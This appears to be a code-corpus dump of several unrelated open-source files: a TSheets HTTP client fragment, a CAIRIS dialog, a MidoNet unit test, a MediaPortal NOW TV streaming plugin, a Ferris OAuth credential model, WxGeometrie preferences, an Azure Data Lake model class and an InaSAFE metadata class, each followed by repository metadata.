if response.status_code == 417:
raise error.TSheetsExpectedError(e, response)
raise error.TSheetsError(e)
def post(self, url, data, options):
self.logger.debug("POST {} {} {}".format(url, data, options))
response = None
try:
options.update({'Content-type': 'application/json'})
response = requests.post(url, json=data, headers=options)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
if response is not None:
if response.status_code == 417:
raise error.TSheetsExpectedError(e, response)
raise error.TSheetsError(e)
def put(self, url, data, options):
self.logger.debug("PUT {} {} {}".format(url, data, options))
response = None
try:
options.update({'Content-type': 'application/json'})
response = requests.put(url, json=data, headers=options)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
if response is not None:
if response.status_code == 417:
raise error.TSheetsExpectedError(e, response)
raise error.TSheetsError(e)
def delete(self, url, data, options):
self.logger.debug("DELETE {} {} {}".format(url, data, options))
try:
ids_to_delete = ','.join(str(id) for id in data['ids'])
response = requests.delete(url, params={"ids":ids_to_delete }, headers=options)
response.raise_for_status()
return response
except requests.exceptions.RequestException as e:
raise error.TSheetsError(e) | mit | -1,571,255,879,130,527,200 | 38.881356 | 91 | 0.58716 | false |
nathanbjenx/cairis | cairis/gui/DictionaryEntryDialog.py | 1 | 2956 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import wx
from cairis.core.armid import *
import WidgetFactory
__author__ = 'Shamal Faily'
class DictionaryEntryDialog(wx.Dialog):
def __init__(self,parent,name = '',definition = ''):
wx.Dialog.__init__(self,parent,DICTIONARYENTRY_ID,'Add Dictionary Entry',style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(500,300))
self.theName = name
self.theDefinition = definition
mainSizer = wx.BoxSizer(wx.VERTICAL)
mainSizer.Add(WidgetFactory.buildTextSizer(self,'Name',(87,30),DICTIONARYENTRY_TEXTNAME_ID),0,wx.EXPAND)
mainSizer.Add(WidgetFactory.buildMLTextSizer(self,'Definition',(87,30),DICTIONARYENTRY_TEXTDEFINITION_ID),1,wx.EXPAND)
mainSizer.Add(WidgetFactory.buildAddCancelButtonSizer(self,DICTIONARYENTRY_BUTTONCOMMIT_ID),0,wx.ALIGN_CENTER)
self.SetSizer(mainSizer)
wx.EVT_BUTTON(self,DICTIONARYENTRY_BUTTONCOMMIT_ID,self.onCommit)
self.commitLabel = 'Add'
if (len(self.theName) > 0):
self.commitLabel = 'Edit'
self.SetLabel('Edit Dictionary Entry')
nameCtrl = self.FindWindowById(DICTIONARYENTRY_TEXTNAME_ID)
nameCtrl.SetValue(self.theName)
defCtrl = self.FindWindowById(DICTIONARYENTRY_TEXTDEFINITION_ID)
defCtrl.SetValue(self.theDefinition)
buttonCtrl = self.FindWindowById(DICTIONARYENTRY_BUTTONCOMMIT_ID)
buttonCtrl.SetLabel('Edit')
def onCommit(self,evt):
nameCtrl = self.FindWindowById(DICTIONARYENTRY_TEXTNAME_ID)
defCtrl = self.FindWindowById(DICTIONARYENTRY_TEXTDEFINITION_ID)
self.theName = nameCtrl.GetValue()
self.theDefinition = defCtrl.GetValue()
if (len(self.theName) == 0):
dlg = wx.MessageDialog(self,'No name entry',self.commitLabel + ' Dictionary Entry',wx.OK)
dlg.ShowModal()
dlg.Destroy()
return
elif (len(self.theDefinition) == 0):
dlg = wx.MessageDialog(self,'No definition entry',self.commitLabel + ' Dictionary Entry',wx.OK)
dlg.ShowModal()
dlg.Destroy()
return
else:
self.EndModal(DICTIONARYENTRY_BUTTONCOMMIT_ID)
def name(self): return self.theName
def definition(self): return self.theDefinition
| apache-2.0 | -2,763,793,593,359,944,700 | 40.055556 | 170 | 0.732747 | false |
midonet/python-neutron-plugin-midonet | midonet/neutron/tests/unit/test_midonet_driver.py | 1 | 2110 | # vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (C) 2012 Midokura Japan K.K.
# Copyright (C) 2013 Midokura PTE LTD
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
import sys
sys.modules["midonetclient"] = mock.Mock()
from neutron.agent.common import config
from neutron.agent.linux import dhcp
from neutron.common import config as base_config
import midonet.neutron.agent.midonet_driver as driver
from neutron.tests import base
class FakeNetwork:
id = 'aaaabbbb-cccc-dddd-eeee-ffff00001111'
namespace = 'qdhcp-ns'
class TestDhcpNoOpDriver(base.BaseTestCase):
def setUp(self):
super(TestDhcpNoOpDriver, self).setUp()
self.conf = config.setup_conf()
config.register_interface_driver_opts_helper(self.conf)
self.conf.register_opts(base_config.core_opts)
self.conf.register_opts(dhcp.OPTS)
self.conf.enable_isolated_metadata = True
self.conf.use_namespaces = True
instance = mock.patch("neutron.agent.linux.dhcp.DeviceManager")
self.mock_mgr = instance.start()
self.addCleanup(instance.stop)
def test_disable_no_retain_port(self):
dhcp_driver = driver.DhcpNoOpDriver(self.conf, FakeNetwork())
dhcp_driver.disable(retain_port=False)
self.assertTrue(self.mock_mgr.return_value.destroy.called)
def test_disable_retain_port(self):
dhcp_driver = driver.DhcpNoOpDriver(self.conf, FakeNetwork())
dhcp_driver.disable(retain_port=True)
self.assertFalse(self.mock_mgr.return_value.destroy.called)
| apache-2.0 | -6,664,119,107,720,711,000 | 36.017544 | 78 | 0.718009 | false |
n3wb13/OpenNfrGui-5.0-1 | lib/python/Plugins/Extensions/MediaPortal/additions/mediatheken/nowtv.py | 1 | 14451 | # -*- coding: utf-8 -*-
###############################################################################################
#
# MediaPortal for Dreambox OS
#
# Coded by MediaPortal Team (c) 2013-2015
#
# This plugin is open source but it is NOT free software.
#
# This plugin may only be distributed to and executed on hardware which
# is licensed by Dream Property GmbH. This includes commercial distribution.
# In other words:
# It's NOT allowed to distribute any parts of this plugin or its source code in ANY way
# to hardware which is NOT licensed by Dream Property GmbH.
# It's NOT allowed to execute this plugin and its source code or even parts of it in ANY way
# on hardware which is NOT licensed by Dream Property GmbH.
#
# This applies to the source code as a whole as well as to parts of it, unless
# explicitely stated otherwise.
#
# If you want to use or modify the code or parts of it,
# you have to keep OUR license and inform us about the modifications, but it may NOT be
# commercially distributed other than under the conditions noted above.
#
# As an exception regarding modifcations, you are NOT permitted to remove
# any copy protections implemented in this plugin or change them for means of disabling
# or working around the copy protections, unless the change has been explicitly permitted
# by the original authors. Also decompiling and modification of the closed source
# parts is NOT permitted.
#
# Advertising with this plugin is NOT allowed.
# For other uses, permission from the authors is necessary.
#
###############################################################################################
from Plugins.Extensions.MediaPortal.plugin import _
from Plugins.Extensions.MediaPortal.resources.imports import *
from Plugins.Extensions.MediaPortal.resources.twagenthelper import twAgentGetPage
from Plugins.Extensions.MediaPortal.resources.playrtmpmovie import PlayRtmpMovie
BASE_URL = "https://api.nowtv.de/v3/"
def remove_start(s, start):
if s.startswith(start):
return s[len(start):]
return s
class nowtvFirstScreen(MPScreen, ThumbsHelper):
def __init__(self, session):
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultGenreScreenCover.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreenCover.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
ThumbsHelper.__init__(self)
self["actions"] = ActionMap(["MP_Actions"], {
"0" : self.closeAll,
"ok" : self.keyOK,
"cancel": self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft
}, -1)
self['title'] = Label("NOW TV")
self['ContentTitle'] = Label(_("Stations:"))
self['name'] = Label(_("Selection:"))
self.keyLocked = True
self.senderliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.genreData)
def genreData(self):
self.senderliste.append(("RTL", "rtl", "http://cdn.static-fra.de/nowtv/default/rtl_portrait.jpg"))
self.senderliste.append(("VOX", "vox", "http://cdn.static-fra.de/nowtv/default/vox_portrait.jpg"))
self.senderliste.append(("RTL2", "rtl2", "http://cdn.static-fra.de/nowtv/default/rtl2_portrait.jpg"))
self.senderliste.append(("RTLNITRO", "nitro", "http://cdn.static-fra.de/nowtv/default/nitro_portrait.jpg"))
self.senderliste.append(("SUPER RTL", "superrtl", "http://cdn.static-fra.de/nowtv/default/superrtl_portrait.jpg"))
self.senderliste.append(("n-tv", "ntv", "http://cdn.static-fra.de/nowtv/default/ntv_portrait.jpg"))
self.ml.setList(map(self._defaultlistcenter, self.senderliste))
self.keyLocked = False
self.th_ThumbsQuery(self.senderliste, 0, 1, 2, None, None, 1, 1, mode=1)
self.showInfos()
def showInfos(self):
Image = self['liste'].getCurrent()[0][2]
CoverHelper(self['coverArt']).getCover(Image)
Name = self['liste'].getCurrent()[0][0]
self['name'].setText(_("Selection:") + " " + Name)
def keyOK(self):
if self.keyLocked:
return
Name = self['liste'].getCurrent()[0][0]
Link = self['liste'].getCurrent()[0][1]
Image = self['liste'].getCurrent()[0][2]
self.session.open(nowtvSubGenreScreen, Link, Name, Image)
class nowtvSubGenreScreen(MPScreen, ThumbsHelper):
def __init__(self, session, Link, Name, Image):
self.Link = Link
self.Name = Name
self.Image = Image
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultGenreScreenCover.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreenCover.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
ThumbsHelper.__init__(self)
self["actions"] = ActionMap(["MP_Actions"], {
"0" : self.closeAll,
"ok" : self.keyOK,
"cancel": self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft
}, -1)
self['title'] = Label("NOW TV")
self['ContentTitle'] = Label(_("Selection:"))
self['name'] = Label(_("Selection:") + " " + self.Name)
self.keyLocked = True
self.filmliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
url = BASE_URL + "formats?fields=title,seoUrl,icon,defaultImage169Logo,defaultImage169Format&filter=%7B%22Station%22:%22" + self.Link + "%22,%22Disabled%22:%220%22,%22CategoryId%22:%7B%22containsIn%22:%5B%22serie%22,%22news%22%5D%7D%7D&maxPerPage=1000"
twAgentGetPage(url).addCallback(self.parseData).addErrback(self.dataError)
def parseData(self, data):
nowdata = json.loads(data)
for node in nowdata["items"]:
if str(node["icon"]) == "new" or str(node["icon"]) == "free":
image = str(node["defaultImage169Logo"])
if image == "":
image = str(node["defaultImage169Format"])
if image == "":
image = self.Image
self.filmliste.append((str(node["title"]), str(node["seoUrl"]), image))
self.filmliste.sort(key=lambda t : t[0].lower())
self.ml.setList(map(self._defaultlistcenter, self.filmliste))
self.keyLocked = False
self.th_ThumbsQuery(self.filmliste, 0, 1, 2, None, None, 1, 1, mode=1)
self.showInfos()
def showInfos(self):
Image = self['liste'].getCurrent()[0][2]
CoverHelper(self['coverArt']).getCover(Image)
Name = self['liste'].getCurrent()[0][0]
self['name'].setText(_("Selection:") + " " + self.Name + ":" + Name)
def keyOK(self):
exist = self['liste'].getCurrent()
if self.keyLocked or exist == None:
return
Name = self.Name + ":" + self['liste'].getCurrent()[0][0]
Link = self['liste'].getCurrent()[0][1]
Image = self['liste'].getCurrent()[0][2]
self.session.open(nowtvStaffelScreen, Link, Name, Image)
class nowtvStaffelScreen(MPScreen):
def __init__(self, session, Link, Name, Image):
self.Link = Link
self.Name = Name
self.Image = Image
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultGenreScreenCover.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultGenreScreenCover.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
self["actions"] = ActionMap(["MP_Actions"], {
"0" : self.closeAll,
"ok" : self.keyOK,
"cancel": self.keyCancel,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft
}, -1)
self['title'] = Label("NOW TV")
self['ContentTitle'] = Label(_("Seasons:"))
self['name'] = Label(_("Selection:") + " " + self.Name)
self.keyLocked = True
self.filmliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
url = BASE_URL + "formats/seo?fields=formatTabs.*&name=" + self.Link + ".php"
twAgentGetPage(url).addCallback(self.parseData).addErrback(self.dataError)
def parseData(self, data):
nowdata = json.loads(data)
for node in nowdata["formatTabs"]["items"]:
self.filmliste.append((str(node["headline"]), str(node["id"]), str(node["visible"]),str(node["tv"])))
self.ml.setList(map(self._defaultlistcenter, self.filmliste))
self.keyLocked = False
CoverHelper(self['coverArt']).getCover(self.Image)
self.showInfos()
def showInfos(self):
Name = self['liste'].getCurrent()[0][0]
self['name'].setText(_("Selection:") + " " + self.Name + ":" + Name)
def keyOK(self):
exist = self['liste'].getCurrent()
if self.keyLocked or exist == None:
return
Name = self.Name + ":" + self['liste'].getCurrent()[0][0]
Link = self['liste'].getCurrent()[0][1]
self.session.open(nowtvEpisodenScreen, Link, Name, self.Image)
class nowtvEpisodenScreen(MPScreen, ThumbsHelper):
def __init__(self, session, Link, Name, Image):
self.Link = Link
self.Name = Name
self.Image = Image
self.plugin_path = mp_globals.pluginPath
self.skin_path = mp_globals.pluginPath + mp_globals.skinsPath
path = "%s/%s/defaultListWideScreen.xml" % (self.skin_path, config.mediaportal.skin.value)
if not fileExists(path):
path = self.skin_path + mp_globals.skinFallback + "/defaultListWideScreen.xml"
with open(path, "r") as f:
self.skin = f.read()
f.close()
MPScreen.__init__(self, session)
ThumbsHelper.__init__(self)
self["actions"] = ActionMap(["MP_Actions"], {
"0" : self.closeAll,
"ok" : self.keyOK,
"cancel": self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft,
"blue" : self.keyTxtPageDown,
"red" : self.keyTxtPageUp
}, -1)
self['title'] = Label("NOW TV")
self['ContentTitle'] = Label(_("Episodes:"))
self['name'] = Label(_("Selection:") + " " + self.Name)
self['F1'] = Label(_("Text-"))
self['F4'] = Label(_("Text+"))
self.keyLocked = True
self.filmliste = []
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.onLayoutFinish.append(self.loadPage)
def loadPage(self):
url = BASE_URL + "formatlists/" + self.Link + "?fields=*,formatTabPages.*,formatTabPages.container.movies.*,formatTabPages.container.movies.format.*,formatTabPages.container.movies.livestreamEvent.*,formatTabPages.container.movies.pictures,formatTabPages.container.movies.files.*"
twAgentGetPage(url).addCallback(self.parseData).addErrback(self.dataError)
def parseData(self, data):
nowdata = json.loads(data)
for node in nowdata["formatTabPages"]["items"]:
try:
for nodex in node["container"]["movies"]["items"]:
try:
if nodex["free"]:
try:
image = "http://autoimg.rtl.de/rtlnow/%s/660x660/formatimage.jpg" % nodex["pictures"]["default"][0]["id"]
except:
image = self.Image
try:
file = str(nodex["files"]["items"][0]["path"])
file = re.sub(r'/(.+)/((\d+)/(.*))', r'/\1/videos/\2', file)
file = file.strip('/')
except:
file = None
self.filmliste.append((str(nodex["title"]), str(nodex["id"]), str(nodex["articleLong"]), image, file))
except:
continue
except:
continue
if len(self.filmliste) == 0:
self.filmliste.append((_('Currently no free episodes available!'), None, None, None))
self.ml.setList(map(self._defaultlistcenter, self.filmliste))
self.keyLocked = False
self.th_ThumbsQuery(self.filmliste, 0, 1, 2, None, None, 1, 1, mode=1)
self.showInfos()
def showInfos(self):
Descr = self['liste'].getCurrent()[0][2]
Image = self['liste'].getCurrent()[0][3]
self['handlung'].setText(decodeHtml(Descr))
CoverHelper(self['coverArt']).getCover(Image)
Name = self['liste'].getCurrent()[0][0]
self['name'].setText(_("Selection:") + " " + self.Name + ":" + Name)
def keyOK(self):
id = self['liste'].getCurrent()[0][1]
if self.keyLocked or id == None:
return
url = 'https://api.nowtv.de/v3/movies/%s?fields=files' % id
getPage(url, agent=std_headers).addCallback(self.get_stream).addErrback(self.dataError)
def get_stream(self, data):
videoPrio = int(config.mediaportal.videoquali_others.value)
if videoPrio == 2:
bw = 1300
elif videoPrio in (0, 1):
bw = 600
nowdata = json.loads(data)
format = None
for node in nowdata["files"]["items"]:
if node['type'] != u'video/x-f4v':
continue
_bw = node.get('bitrate', 0)
app, play_path = remove_start(node['path'], '/').split('/', 1)
format = {
'url': 'rtmpe://fms.rtl.de',
'app': app,
'play_path': 'mp4:%s' % play_path,
'page_url': 'http://%s.rtl.de' % app,
'player_url': 'http://cdn.static-fra.de/now/vodplayer.swf',
'tbr': _bw,
}
if _bw == bw:
break
if format:
Name = self['liste'].getCurrent()[0][0]
if config.mediaportal.useRtmpDump.value:
final = "{url}' --playpath={play_path} --app={app} --swfVfy={player_url} --pageUrl={page_url} --timeout=120'".format(**format)
movieinfo = [str(final),Name]
self.session.open(PlayRtmpMovie, movieinfo, Name, playCallback=self.playRtmpStream)
else:
final = "{url} swfVfy=1 playpath={play_path} app={app} swfUrl={player_url} pageUrl={page_url} timeout=120".format(**format)
self.session.open(SimplePlayer, [(Name, str(final))], showPlaylist=False, ltype='nowtv')
else:
self.session.open(MessageBoxExt, _("No Streams found!"), MessageBoxExt.TYPE_INFO)
def playRtmpStream(self, movietitle, moviepath, movie_img, cont_cb=None, exit_cb=None):
self.playrtmp_cont_callback = cont_cb
self.playrtmp_exit_callback = exit_cb
self.session.openWithCallback(self.cb_Player, SimplePlayer, [(movietitle, moviepath, movie_img)], cover=False, showPlaylist=False, ltype='rtlnow-rtmp', useResume=False, bufferingOpt = 'rtmpbuffering')
def cb_Player(self, retval=None):
if retval == 'continue':
self.playrtmp_cont_callback()
else:
self.playrtmp_exit_callback() | gpl-2.0 | 3,022,125,555,762,989,000 | 36.72846 | 282 | 0.667105 | false |
yowmamasita/social-listener-exam | ferris/core/oauth2/user_credentials.py | 1 | 2290 | """
OAuth dance session
"""
from google.appengine.ext import ndb
from ferris.core.ndb import Model
from credentials_property import CredentialsProperty
from ndb_storage import NdbStorage
import hashlib
class UserCredentials(Model):
user = ndb.UserProperty(indexed=True)
scopes = ndb.StringProperty(repeated=True, indexed=False)
admin = ndb.BooleanProperty(indexed=True)
credentials = CredentialsProperty(indexed=False)
filter_scopes = ndb.ComputedProperty(lambda x: ','.join(sorted(x.scopes)), indexed=True)
@classmethod
def _get_kind(cls):
return '__ferris__oauth2_user_credentials'
@classmethod
def after_get(cls, key, item):
if item and item.credentials:
item.credentials = NdbStorage(key, 'credentials', item).get()
@classmethod
def _get_key(cls, user, scopes, admin):
scopes_hash = hashlib.sha1(','.join(sorted(scopes))).hexdigest()
return ndb.Key(cls, '%s:%s:%s' % (user, scopes_hash, True if admin else False))
@classmethod
def create(cls, user, scopes, credentials, admin):
key = cls._get_key(user, scopes, admin)
item = cls(key=key, user=user, scopes=scopes, credentials=credentials, admin=admin)
item.put()
return item
@classmethod
def find(cls, user=None, scopes=None, admin=False):
if user and scopes:
key = cls._get_key(user, scopes, admin)
x = key.get()
else:
q = cls.query()
if user:
q = q.filter(cls.user == user)
if scopes:
q = q.filter(cls.filter_scopes == ','.join(sorted(scopes)))
if admin:
q = q.filter(cls.admin == admin)
x = q.get()
if x:
cls.after_get(x.key, x)
return x
@classmethod
def delete_all(cls, user):
c = cls.query().filter(user=user)
for x in c:
x.key.delete()
def find_credentials(user=None, scopes=None, admin=None):
"""
Finds credentials that fit the criteria provided. If no user is provided,
the first set of credentials that have the given scopes and privilege level.
Returns None if no credentials are found.
"""
return UserCredentials.find(user, scopes, admin)
| mit | 1,136,767,489,607,611,600 | 29.945946 | 92 | 0.619214 | false |
wxgeo/geophar | wxgeometrie/param/options.py | 1 | 4911 | # -*- coding: utf-8 -*-
# WxGeometrie
# Dynamic geometry, graph plotter, and more for french mathematic teachers.
# Copyright (C) 2005-2013 Nicolas Pourcelot
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
######################################
# bool -> CheckBox
# file -> sélectionner un répertoire
# str -> TextCtrl
# (min, max) -> SpinCtrl
# [bool] -> CheckListBox
# ['item1', 'blabla2', ...] -> Choice
from copy import deepcopy
from io import IOBase as file
from .modules import modules as _modules, descriptions_modules
class Rubrique(list):
def __init__(self, titre):
self.titre = titre
list.__init__(self)
def add(self, value):
list.append(self, value)
return value
class Options(Rubrique):
pass
class Theme(Rubrique):
pass
class Section(Rubrique):
pass
class Parametre(object):
def __init__(self, _texte, _get = (lambda x:x), _set = (lambda x:x), **kw):
assert len(kw) == 1
self.nom, self.type = kw.popitem()
if '__' in self.nom:
self.prefixe, self.key = self.nom.split('__', 1)
else:
self.prefixe = self.nom
self.key = None
self._get = _get
self._set = _set
self.defaut = deepcopy(self.valeur)
self.texte = _texte
def _get_val(self):
from .. import param
if self.key is None:
val = getattr(param, self.nom)
else:
val = getattr(param, self.prefixe)[self.key]
return self._get(val)
def _set_val(self, val):
from .. import param
val = self._set(val)
if self.key is None:
setattr(param, self.nom, val)
else:
getattr(param, self.prefixe)[self.key] = val
valeur = property(_get_val, _set_val)
P = Parametre
options = Options('Préférences')
## GENERAL
general = options.add(Theme('Général'))
general.add(P('Utilisateur', utilisateur = str))
general.add(P("Nombre maximal d'annulations", nbr_annulations = (0, 1000)))
ouverture = general.add(Section('Au démarrage'))
ouverture.add(P('Restaurer automatiquement la session précédente.', auto_restaurer_session=bool))
fermeture = general.add(Section('À la fermeture'))
fermeture.add(P('Demander confirmation avant de quitter.', confirmer_quitter = bool))
fermeture.add(P('Sauvegarder les préférences.', sauver_preferences = bool))
auto = general.add(Section('Sauvegarde automatique'))
auto.add(P('Intervalle entre deux sauvegardes', sauvegarde_automatique = (0, 10000)))
auto.add('Temps (en dizaine de s) entre deux sauvegardes automatiques.')
auto.add('La valeur 0 désactive la sauvegarde automatique.')
## MODULES
modules = options.add(Theme('Modules'))
liste = modules.add(Section('Activer les modules suivants'))
for nom in _modules:
d = {'modules_actifs__' + nom: bool}
liste.add(P(descriptions_modules[nom]['titre'], **d))
modules.add('Nota: les modules non activés par défaut peuvent être non documentés\net/ou encore expérimentaux.')
#modules.add(P(u'Activer les modules suivants', modules_actifs = dict))
## FORMAT
format = options.add(Theme('Format'))
format.add(P('Décimales affichées', decimales=(0, 10)))
format.add(P('Unité d\'angle',
_get = (lambda k: {'d': 'degré', 'r': 'radian', 'g':' grade'}[k]),
_set = (lambda s: s[0]),
unite_angle = ['degré', 'radian', 'grade']
))
format.add(P('Séparateur décimal',
_get = (lambda k: {',': 'virgule', '.': 'point'}[k]),
_set = (lambda k: {'virgule': ',', 'point': '.'}[k]),
separateur_decimal = ['virgule', 'point']
))
## AVANCÉ
avance = options.add(Theme('Avancé'))
export = avance.add(Section("Export"))
export.add(P("Résolution des images PNG", dpi_export=(10, 10000)))
sauvegarde = avance.add(Section("Sauvegarde"))
sauvegarde.add(P("Compresser les fichiers .geo par défaut.", compresser_geo=bool))
empl_pref = avance.add(Section("Répertoires d'enregistrement"))
empl_pref.add(P("Préférences", emplacements__preferences=open))
empl_pref.add(P("Session", emplacements__session=open))
empl_pref.add(P("Rapports d'erreur", emplacements__log=open))
| gpl-2.0 | 6,670,033,521,094,492,000 | 31.744966 | 112 | 0.64296 | false |
Azure/azure-sdk-for-python | sdk/datalake/azure-mgmt-datalake-analytics/azure/mgmt/datalake/analytics/catalog/models/usql_table.py | 1 | 3104 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .catalog_item import CatalogItem
class USqlTable(CatalogItem):
"""A Data Lake Analytics catalog U-SQL table item.
:param compute_account_name: the name of the Data Lake Analytics account.
:type compute_account_name: str
:param version: the version of the catalog item.
:type version: str
:param database_name: the name of the database.
:type database_name: str
:param schema_name: the name of the schema associated with this table and
database.
:type schema_name: str
:param name: the name of the table.
:type name: str
:param column_list: the list of columns in this table
:type column_list:
list[~azure.mgmt.datalake.analytics.catalog.models.USqlTableColumn]
:param index_list: the list of indices in this table
:type index_list:
list[~azure.mgmt.datalake.analytics.catalog.models.USqlIndex]
:param partition_key_list: the list of partition keys in the table
:type partition_key_list: list[str]
:param external_table: the external table associated with the table.
:type external_table:
~azure.mgmt.datalake.analytics.catalog.models.ExternalTable
:param distribution_info: the distributions info of the table
:type distribution_info:
~azure.mgmt.datalake.analytics.catalog.models.USqlDistributionInfo
"""
_attribute_map = {
'compute_account_name': {'key': 'computeAccountName', 'type': 'str'},
'version': {'key': 'version', 'type': 'str'},
'database_name': {'key': 'databaseName', 'type': 'str'},
'schema_name': {'key': 'schemaName', 'type': 'str'},
'name': {'key': 'tableName', 'type': 'str'},
'column_list': {'key': 'columnList', 'type': '[USqlTableColumn]'},
'index_list': {'key': 'indexList', 'type': '[USqlIndex]'},
'partition_key_list': {'key': 'partitionKeyList', 'type': '[str]'},
'external_table': {'key': 'externalTable', 'type': 'ExternalTable'},
'distribution_info': {'key': 'distributionInfo', 'type': 'USqlDistributionInfo'},
}
def __init__(self, **kwargs):
super(USqlTable, self).__init__(**kwargs)
self.database_name = kwargs.get('database_name', None)
self.schema_name = kwargs.get('schema_name', None)
self.name = kwargs.get('name', None)
self.column_list = kwargs.get('column_list', None)
self.index_list = kwargs.get('index_list', None)
self.partition_key_list = kwargs.get('partition_key_list', None)
self.external_table = kwargs.get('external_table', None)
self.distribution_info = kwargs.get('distribution_info', None)
| mit | -7,905,476,458,018,455,000 | 45.328358 | 89 | 0.632088 | false |
wonder-sk/inasafe | safe/impact_functions/generic/classified_polygon_building/metadata_definitions.py | 1 | 4200 | # coding=utf-8
"""InaSAFE Disaster risk tool by Australian Aid - Generic Polygon on Building
Metadata Definitions.
Contact : [email protected]
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
from safe.common.utilities import OrderedDict
from safe.definitions import (
layer_mode_classified,
layer_geometry_polygon,
layer_geometry_point,
hazard_all,
hazard_category_multiple_event,
exposure_structure,
all_vector_hazard_classes,
hazard_category_single_event,
structure_class_field
)
from safe.impact_functions.impact_function_metadata import \
ImpactFunctionMetadata
from safe.utilities.i18n import tr
class ClassifiedPolygonHazardBuildingFunctionMetadata(ImpactFunctionMetadata):
"""Metadata for ClassifiedPolygonBuildingFunctionMetadata.
.. versionadded:: 3.1
We only need to re-implement as_dict(), all other behaviours
are inherited from the abstract base class.
"""
@staticmethod
def as_dict():
dict_meta = {
'id': 'ClassifiedPolygonHazardBuildingFunction',
'name': tr('Classified polygon hazard on buildings'),
'impact': tr('Be affected'),
'title': tr('Be affected'),
'function_type': 'old-style',
'author': 'Akbar Gumbira ([email protected])',
'date_implemented': '17/04/2015',
'overview': tr(
'To assess the impact of each hazard zone on buildings.'),
'detailed_description': '',
'hazard_input': tr(
'The hazard layer must be a polygon layer. This layer '
'must have an attribute representing the hazard '
'zone that can be specified in the impact function options.'),
'exposure_input': tr(
'Vector polygon layer extracted from OSM where each '
'polygon represents the footprint of a building.'),
'output': tr(
'A vector layer of buildings with each tagged according to '
'the hazard zone in which it falls.'),
'actions': tr(
'Provide details about how many buildings fall within '
'each hazard zone.'),
'limitations': [],
'citations': [],
'layer_requirements': {
'hazard': {
'layer_mode': layer_mode_classified,
'layer_geometries': [layer_geometry_polygon],
'hazard_categories': [
hazard_category_multiple_event,
hazard_category_single_event
],
'hazard_types': hazard_all,
'continuous_hazard_units': [],
'vector_hazard_classifications':
all_vector_hazard_classes,
'raster_hazard_classifications': [],
'additional_keywords': []
},
'exposure': {
'layer_mode': layer_mode_classified,
'layer_geometries': [
layer_geometry_point,
layer_geometry_polygon
],
'exposure_types': [exposure_structure],
'exposure_units': [],
'exposure_class_fields': [structure_class_field],
'additional_keywords': []
}
},
'parameters': OrderedDict([
# The attribute of hazard zone in hazard layer
('hazard zone attribute', 'KRB')
])
}
